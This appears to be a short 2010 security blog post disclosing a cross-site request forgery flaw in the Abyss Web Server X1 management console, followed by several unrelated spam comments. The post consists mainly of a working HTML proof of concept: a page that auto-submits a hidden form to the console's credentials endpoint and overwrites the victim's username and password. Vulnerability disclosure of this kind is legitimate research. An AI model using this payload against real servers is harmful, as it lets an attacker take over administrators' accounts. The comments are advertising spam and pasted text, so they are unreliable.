This site is soon to be deprecated by

Thursday, May 13, 2010

Abyss Web Server X1 XSRF

A cross-site request forgery vunlerability in the Abyss Web Server X1 management console can be exploited to change both the username and password of the logged in user.


<body onload="document.forms[0].submit()">
<form method="post" action="http://localhost:9999/console/credentials">
<input type="hidden" name="/console/credentials/login"
value="new_username" />
<input type="hidden" name="/console/credentials/password/$pass1"
value="new_password" />
<input type="hidden" name="/console/credentials/password/$pass2"
value="new_password" />
<input type="hidden" name="/console/credentials/bok"
value="%C2%A0%C2%A0OK%C2%A0%C2%A0" />


  1. Thanks a lot for enjoying this beauty article with me. I am apreciating it very much! Looking forward to another great article. Good luck to the author! all the best!

    WIFI network installations Cheap Car Rentals

  2. We make these interchangeable face plates in real diamond or simulated diamonds depending on your budget. For our simulated diamond face plates we use the highest quality stones available in the market so that each stone is absolutely flawless.

    custom g shock watches
    Pink Lubricant

  3. We offer personalized service - so you can talk to a real person about your health insurance needs and have plan benefits and terms fully explained to you - that quickly finds you the best health insurance plan for you at the lowest possible price. Simply fill out our form and we'll get back to you with a quote within 24 hours.

    health insurance georgia
    nutritional supplements

  4. Turkish officials say they have been pressing both these groups to focus on stopping a slide into full-scale civil war, a goal that requires the Free Syrian Army to scale back its attacks, our correspondent says.

    In Brussels, European ministers said Syrian repression risked taking the country down "a very dangerous path of violence, sectarian clashes and militarisation", according to AFP.

    The EU imposed a 10th round of sanctions on the government, placing bans on exporting gas and oil industry equipment to Syria and trading Syrian government bonds.
    vestidos de fiesta cortosWedding DJs Middletown

  5. Sake is produced by the multiple parallel fermentation of rice. The rice is first polished to remove the protein and oils from the exterior of the rice grains, leaving behind starch. Thorough milling leads to fewer congeners and generally a more desirable product.
    Newly polished rice is allowed to "rest" until it has absorbed enough moisture from the air so that it will not crack when immersed in water. After this resting period, the rice is washed clean of the rice powder produced during milling and then steeped in water. The length of time depends on the degree to which the rice was polished, ranging from several hours or even overnight for an ordinary milling to just minutes for highly polished rice.
    After soaking, the rice is steamed on a conveyor belt. The degree of cooking must be carefully controlled; overcooked rice will ferment too quickly for flavors to develop well and undercooked rice will only ferment on the outside. The steamed rice is then cooled and divided into portions for different uses.
    rainwater harvestingSales Recruitment

  6. outlines an eight-step process of partisan religious change in which
    the party in the electorate receives cues from activists and strategic politicians
    Sexy Lingeriecheap alarm monitoring

  7. This boat flag for the Atlanta Falcons is 12"x18" in size,Kansas City Chiefs banners is made of two-ply polyester,buy Jacksonville Jaguars flags offers double stitched fly-ends and screen printed team logos,cheap Indianapolis Colts flags and has two metal grommets for wholesale Indiana Colts flags flying from your boat frame,Houston Texans flags motorcycle pole,cheap nfl flags or our All Purpose Mount.

    Since the flags are two-ply double-sided,nfl sports flags the Atlanta Falcons team logos are viewable and readable correctly on both sides.

    These Boat Flags are Officially Licensed by the selected team and the NFL